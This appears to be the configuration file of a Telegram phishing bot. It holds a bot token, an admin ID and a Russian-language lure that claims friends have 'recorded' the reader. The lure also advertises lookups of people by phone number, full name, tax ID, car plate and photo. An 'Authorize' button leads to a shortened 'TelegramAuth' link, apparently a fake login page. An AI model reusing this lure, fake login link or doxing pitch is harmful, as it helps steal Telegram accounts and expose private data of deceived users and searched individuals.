# - *- coding: utf- 8 - *-
[SETTINGS]
TOKEN=5582097032:AAEDIOnnuJkpJ-op-KhBHsJx7O5WxsjQAO8
start_text=😱 Бегиии! смотреть как тебя запuсалиu друзья 🔔 Второстепенны функции бота: --📞 Поиск по номеру телефона --🌐 Поиск информации по ссылкам на социальные сети --👤 Поиск по ФИО --📑 Поиск информации по ИНН --🚗 Поиск по номеру автомобиля --📸 Поиск по фотографии 

web_button_name=Авторизоваться
web_url=https://gg.gg/TelegramAuth
[PHOTO]
file_type=jpg
;file_type - jpg

[ADMIN]
admin_id=1361816235
